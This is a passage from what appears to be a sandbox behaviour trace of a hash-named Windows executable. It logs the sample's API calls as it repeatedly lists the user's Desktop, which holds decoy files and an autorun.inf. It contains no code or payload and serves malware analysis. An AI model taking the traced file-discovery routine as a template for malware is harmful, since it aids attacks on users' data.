out: lpFindFileData=0x1aef40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0298.044] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0298.044] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1dfe10, ftCreationTime.dwHighDateTime=0x1d7d73d, ftLastAccessTime.dwLowDateTime=0x590d3ff0, ftLastAccessTime.dwHighDateTime=0x1d7de66, ftLastWriteTime.dwLowDateTime=0x590d3ff0, ftLastWriteTime.dwHighDateTime=0x1d7de66, nFileSizeHigh=0x0, nFileSizeLow=0x16800, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aih45hu.jpg", cAlternateFileName="")) returned 1 [0298.044] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1866520, ftCreationTime.dwHighDateTime=0x1d7df30, ftLastAccessTime.dwLowDateTime=0xd42ebbb0, ftLastAccessTime.dwHighDateTime=0x1d7e5db, ftLastWriteTime.dwLowDateTime=0xd42ebbb0, ftLastWriteTime.dwHighDateTime=0x1d7e5db, nFileSizeHigh=0x0, nFileSizeLow=0x7511, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-0bKIu_zvUdt.mkv", cAlternateFileName="4-0BKI~1.MKV")) returned 1 [0298.044] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0d6f00, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0x7ea60580, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xdac2100, ftLastWriteTime.dwHighDateTime=0x1d82242, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", cAlternateFileName="69811A~1.EXE")) returned 1 [0298.045] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd71272d6, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd8250b16, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x41, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf", cAlternateFileName="")) returned 1 [0298.045] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x952e9530, ftLastAccessTime.dwHighDateTime=0x1d7e22e, ftLastWriteTime.dwLowDateTime=0x952e9530, ftLastWriteTime.dwHighDateTime=0x1d7e22e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj", cAlternateFileName="BGQH9X~1")) returned 1 [0298.045] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e9a4740, ftCreationTime.dwHighDateTime=0x1d7e276, ftLastAccessTime.dwLowDateTime=0x19402410, ftLastAccessTime.dwHighDateTime=0x1d7e54f, ftLastWriteTime.dwLowDateTime=0x19402410, ftLastWriteTime.dwHighDateTime=0x1d7e54f, nFileSizeHigh=0x0, nFileSizeLow=0x12fb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc", cAlternateFileName="CSI0AP~1.DOC")) returned 1 [0298.046] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63934470, ftCreationTime.dwHighDateTime=0x1d7e419, ftLastAccessTime.dwLowDateTime=0xbc7be2f0, ftLastAccessTime.dwHighDateTime=0x1d7e4b8, ftLastWriteTime.dwLowDateTime=0xbc7be2f0, ftLastWriteTime.dwHighDateTime=0x1d7e4b8, nFileSizeHigh=0x0, nFileSizeLow=0xa1bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc", cAlternateFileName="")) returned 1 [0298.046] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cfa0da0, ftCreationTime.dwHighDateTime=0x1d7d73f, ftLastAccessTime.dwLowDateTime=0x2ce7c810, ftLastAccessTime.dwHighDateTime=0x1d7e662, ftLastWriteTime.dwLowDateTime=0x2ce7c810, ftLastWriteTime.dwHighDateTime=0x1d7e662, nFileSizeHigh=0x0, nFileSizeLow=0x16df9, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx", cAlternateFileName="D-A24D~1.XLS")) returned 1 [0298.046] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0298.046] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc54fb7f0, ftCreationTime.dwHighDateTime=0x1d7db33, ftLastAccessTime.dwLowDateTime=0x305a1bd0, ftLastAccessTime.dwHighDateTime=0x1d7dea9, ftLastWriteTime.dwLowDateTime=0x305a1bd0, ftLastWriteTime.dwHighDateTime=0x1d7dea9, nFileSizeHigh=0x0, nFileSizeLow=0xed9a, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav", cAlternateFileName="G2JIFN~1.WAV")) returned 1 [0298.047] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8e1e30, ftCreationTime.dwHighDateTime=0x1d7da06, ftLastAccessTime.dwLowDateTime=0xd8e93720, ftLastAccessTime.dwHighDateTime=0x1d7dbc2, ftLastWriteTime.dwLowDateTime=0xd8e93720, ftLastWriteTime.dwHighDateTime=0x1d7dbc2, nFileSizeHigh=0x0, nFileSizeLow=0x9ada, dwReserved0=0x0, dwReserved1=0x0, cFileName="h aXUsMO6g.png", cAlternateFileName="HAXUSM~1.PNG")) returned 1 [0298.047] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa1e1c40, ftCreationTime.dwHighDateTime=0x1d7db21, ftLastAccessTime.dwLowDateTime=0x26937cb0, ftLastAccessTime.dwHighDateTime=0x1d7e22b, ftLastWriteTime.dwLowDateTime=0x26937cb0, ftLastWriteTime.dwHighDateTime=0x1d7e22b, nFileSizeHigh=0x0, nFileSizeLow=0x142c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp", cAlternateFileName="")) returned 1 [0298.047] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf92f00f0, ftCreationTime.dwHighDateTime=0x1d7e70c, ftLastAccessTime.dwLowDateTime=0x48586ac0, ftLastAccessTime.dwHighDateTime=0x1d7e746, ftLastWriteTime.dwLowDateTime=0x48586ac0, ftLastWriteTime.dwHighDateTime=0x1d7e746, nFileSizeHigh=0x0, nFileSizeLow=0x12ecf, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi", cAlternateFileName="HHODZG~1.AVI")) returned 1 [0298.047] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb899930, ftCreationTime.dwHighDateTime=0x1d7e3df, ftLastAccessTime.dwLowDateTime=0x1bc21a10, ftLastAccessTime.dwHighDateTime=0x1d7e449, ftLastWriteTime.dwLowDateTime=0x1bc21a10, ftLastWriteTime.dwHighDateTime=0x1d7e449, nFileSizeHigh=0x0, nFileSizeLow=0x4a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi", cAlternateFileName="IWYHBO~1.AVI")) returned 1 [0298.048] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57d4eab0, ftCreationTime.dwHighDateTime=0x1d7dd2c, ftLastAccessTime.dwLowDateTime=0x4f0c7a00, ftLastAccessTime.dwHighDateTime=0x1d7e6f6, ftLastWriteTime.dwLowDateTime=0x4f0c7a00, ftLastWriteTime.dwHighDateTime=0x1d7e6f6, nFileSizeHigh=0x0, nFileSizeLow=0x1787d, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a", cAlternateFileName="")) returned 1 [0298.048] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b6ddf0, ftCreationTime.dwHighDateTime=0x1d7e686, ftLastAccessTime.dwLowDateTime=0xdda50770, ftLastAccessTime.dwHighDateTime=0x1d7e6b8, ftLastWriteTime.dwLowDateTime=0xdda50770, ftLastWriteTime.dwHighDateTime=0x1d7e6b8, nFileSizeHigh=0x0, nFileSizeLow=0x4e4f, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx", cAlternateFileName="L0CW~1.DOC")) returned 1 [0298.048] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc60d2b20, ftCreationTime.dwHighDateTime=0x1d7e13f, ftLastAccessTime.dwLowDateTime=0x634edb40, ftLastAccessTime.dwHighDateTime=0x1d7e6f4, ftLastWriteTime.dwLowDateTime=0x634edb40, ftLastWriteTime.dwHighDateTime=0x1d7e6f4, nFileSizeHigh=0x0, nFileSizeLow=0x6057, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv", cAlternateFileName="L3CXAN~1.MKV")) returned 1 [0298.049] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc396f90, ftCreationTime.dwHighDateTime=0x1d7dc64, ftLastAccessTime.dwLowDateTime=0xb8ec5480, ftLastAccessTime.dwHighDateTime=0x1d7de1e, ftLastWriteTime.dwLowDateTime=0xb8ec5480, ftLastWriteTime.dwHighDateTime=0x1d7de1e, nFileSizeHigh=0x0, nFileSizeLow=0x13cbe, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx", cAlternateFileName="L_WFYU~1.PPT")) returned 1 [0298.049] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8559540, ftCreationTime.dwHighDateTime=0x1d7e270, ftLastAccessTime.dwLowDateTime=0xeb453af0, ftLastAccessTime.dwHighDateTime=0x1d7e6de, ftLastWriteTime.dwLowDateTime=0xeb453af0, ftLastWriteTime.dwHighDateTime=0x1d7e6de, nFileSizeHigh=0x0, nFileSizeLow=0xeb56, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3", cAlternateFileName="")) returned 1 [0298.049] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359a59a0, ftCreationTime.dwHighDateTime=0x1d7e455, ftLastAccessTime.dwLowDateTime=0x775764e0, ftLastAccessTime.dwHighDateTime=0x1d7e64f, ftLastWriteTime.dwLowDateTime=0x775764e0, ftLastWriteTime.dwHighDateTime=0x1d7e64f, nFileSizeHigh=0x0, nFileSizeLow=0x16292, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav", cAlternateFileName="NRKT5N~1.WAV")) returned 1 [0298.049] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbc8d580, ftCreationTime.dwHighDateTime=0x1d7e6fb, ftLastAccessTime.dwLowDateTime=0xbdec11f0, ftLastAccessTime.dwHighDateTime=0x1d7e76f, ftLastWriteTime.dwLowDateTime=0xbdec11f0, ftLastWriteTime.dwHighDateTime=0x1d7e76f, nFileSizeHigh=0x0, nFileSizeLow=0x3621, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp", cAlternateFileName="")) returned 1 [0298.050] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd362020, ftCreationTime.dwHighDateTime=0x1d7e754, ftLastAccessTime.dwLowDateTime=0x709af980, ftLastAccessTime.dwHighDateTime=0x1d7e755, ftLastWriteTime.dwLowDateTime=0x709af980, ftLastWriteTime.dwHighDateTime=0x1d7e755, nFileSizeHigh=0x0, nFileSizeLow=0x1520, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt", cAlternateFileName="SKBR_O~1.PPT")) returned 1 [0298.050] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28b5bac0, ftCreationTime.dwHighDateTime=0x1d7d746, ftLastAccessTime.dwLowDateTime=0xc3fc26e0, ftLastAccessTime.dwHighDateTime=0x1d7de49, ftLastWriteTime.dwLowDateTime=0xc3fc26e0, ftLastWriteTime.dwHighDateTime=0x1d7de49, nFileSizeHigh=0x0, nFileSizeLow=0xe2c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg", cAlternateFileName="")) returned 1 [0298.050] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f9514b0, ftCreationTime.dwHighDateTime=0x1d7e727, ftLastAccessTime.dwLowDateTime=0xa82e8ec0, ftLastAccessTime.dwHighDateTime=0x1d7e737, ftLastWriteTime.dwLowDateTime=0xa82e8ec0, ftLastWriteTime.dwHighDateTime=0x1d7e737, nFileSizeHigh=0x0, nFileSizeLow=0x114f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv", cAlternateFileName="")) returned 1 [0298.050] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbdf3170, ftCreationTime.dwHighDateTime=0x1d7d9ba, ftLastAccessTime.dwLowDateTime=0x61bc6a40, ftLastAccessTime.dwHighDateTime=0x1d7e037, ftLastWriteTime.dwLowDateTime=0x61bc6a40, ftLastWriteTime.dwHighDateTime=0x1d7e037, nFileSizeHigh=0x0, nFileSizeLow=0x18100, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4", cAlternateFileName="")) returned 1 [0298.050] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd81ccee0, ftCreationTime.dwHighDateTime=0x1d7e3a3, ftLastAccessTime.dwLowDateTime=0xbe248520, ftLastAccessTime.dwHighDateTime=0x1d7e450, ftLastWriteTime.dwLowDateTime=0xbe248520, ftLastWriteTime.dwHighDateTime=0x1d7e450, nFileSizeHigh=0x0, nFileSizeLow=0xebfc, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4", cAlternateFileName="TUJLYX~1.MP4")) returned 1 [0298.051] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75e0bb40, ftCreationTime.dwHighDateTime=0x1d7d829, ftLastAccessTime.dwLowDateTime=0x603800f0, ftLastAccessTime.dwHighDateTime=0x1d7dcc5, ftLastWriteTime.dwLowDateTime=0x603800f0, ftLastWriteTime.dwHighDateTime=0x1d7dcc5, nFileSizeHigh=0x0, nFileSizeLow=0x43c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg", cAlternateFileName="V0ZO8W~1.JPG")) returned 1 [0298.051] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63377cb0, ftCreationTime.dwHighDateTime=0x1d7e254, ftLastAccessTime.dwLowDateTime=0xea3dd620, ftLastAccessTime.dwHighDateTime=0x1d7e3f6, ftLastWriteTime.dwLowDateTime=0xea3dd620, ftLastWriteTime.dwHighDateTime=0x1d7e3f6, nFileSizeHigh=0x0, nFileSizeLow=0x2061, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png", cAlternateFileName="")) returned 1 [0298.051] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d08e860, ftCreationTime.dwHighDateTime=0x1d7df82, ftLastAccessTime.dwLowDateTime=0x8ba89350, ftLastAccessTime.dwHighDateTime=0x1d7e736, ftLastWriteTime.dwLowDateTime=0x8ba89350, ftLastWriteTime.dwHighDateTime=0x1d7e736, nFileSizeHigh=0x0, nFileSizeLow=0x887b, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif", cAlternateFileName="WJV4VO~1.GIF")) returned 1 [0298.052] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x577e7830, ftCreationTime.dwHighDateTime=0x1d7e47d, ftLastAccessTime.dwLowDateTime=0x87fef250, ftLastAccessTime.dwHighDateTime=0x1d7e630, ftLastWriteTime.dwLowDateTime=0x87fef250, ftLastWriteTime.dwHighDateTime=0x1d7e630, nFileSizeHigh=0x0, nFileSizeLow=0x1365f, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf", cAlternateFileName="Y4HQQH~1.PDF")) returned 1 [0298.052] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef50 | out: lpFindFileData=0x1aef50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x577e7830, ftCreationTime.dwHighDateTime=0x1d7e47d, ftLastAccessTime.dwLowDateTime=0x87fef250, ftLastAccessTime.dwHighDateTime=0x1d7e630, ftLastWriteTime.dwLowDateTime=0x87fef250, ftLastWriteTime.dwHighDateTime=0x1d7e630, nFileSizeHigh=0x0, nFileSizeLow=0x1365f, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf", cAlternateFileName="Y4HQQH~1.PDF")) returned 0 [0298.052] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0298.053] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af1d8) returned 1 [0298.053] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af1e4) returned 1 [0298.053] CoTaskMemAlloc (cb=0x20c) returned 0x6c7110 [0298.053] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x6c7110 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0298.053] CoTaskMemFree (pv=0x6c7110) [0298.053] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0298.053] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af210) returned 1 [0298.053] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x1aed18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0298.053] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1aecec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0298.054] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.*", lpFindFileData=0x1aef38 | out: lpFindFileData=0x1aef38*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0298.054] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0298.054] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0298.055] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0298.055] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1dfe10, ftCreationTime.dwHighDateTime=0x1d7d73d, ftLastAccessTime.dwLowDateTime=0x590d3ff0, ftLastAccessTime.dwHighDateTime=0x1d7de66, ftLastWriteTime.dwLowDateTime=0x590d3ff0, ftLastWriteTime.dwHighDateTime=0x1d7de66, nFileSizeHigh=0x0, nFileSizeLow=0x16800, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aih45hu.jpg", cAlternateFileName="")) returned 1 [0298.055] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1866520, ftCreationTime.dwHighDateTime=0x1d7df30, ftLastAccessTime.dwLowDateTime=0xd42ebbb0, ftLastAccessTime.dwHighDateTime=0x1d7e5db, ftLastWriteTime.dwLowDateTime=0xd42ebbb0, ftLastWriteTime.dwHighDateTime=0x1d7e5db, nFileSizeHigh=0x0, nFileSizeLow=0x7511, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-0bKIu_zvUdt.mkv", cAlternateFileName="4-0BKI~1.MKV")) returned 1 [0298.056] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0d6f00, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0x7ea60580, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xdac2100, ftLastWriteTime.dwHighDateTime=0x1d82242, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", cAlternateFileName="69811A~1.EXE")) returned 1 [0298.056] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd71272d6, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd8250b16, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x41, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf", cAlternateFileName="")) returned 1 [0298.056] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x952e9530, ftLastAccessTime.dwHighDateTime=0x1d7e22e, ftLastWriteTime.dwLowDateTime=0x952e9530, ftLastWriteTime.dwHighDateTime=0x1d7e22e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj", cAlternateFileName="BGQH9X~1")) returned 1 [0298.056] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e9a4740, ftCreationTime.dwHighDateTime=0x1d7e276, ftLastAccessTime.dwLowDateTime=0x19402410, ftLastAccessTime.dwHighDateTime=0x1d7e54f, ftLastWriteTime.dwLowDateTime=0x19402410, ftLastWriteTime.dwHighDateTime=0x1d7e54f, nFileSizeHigh=0x0, nFileSizeLow=0x12fb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc", cAlternateFileName="CSI0AP~1.DOC")) returned 1 [0298.057] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63934470, ftCreationTime.dwHighDateTime=0x1d7e419, ftLastAccessTime.dwLowDateTime=0xbc7be2f0, ftLastAccessTime.dwHighDateTime=0x1d7e4b8, ftLastWriteTime.dwLowDateTime=0xbc7be2f0, ftLastWriteTime.dwHighDateTime=0x1d7e4b8, nFileSizeHigh=0x0, nFileSizeLow=0xa1bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc", cAlternateFileName="")) returned 1 [0298.057] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, 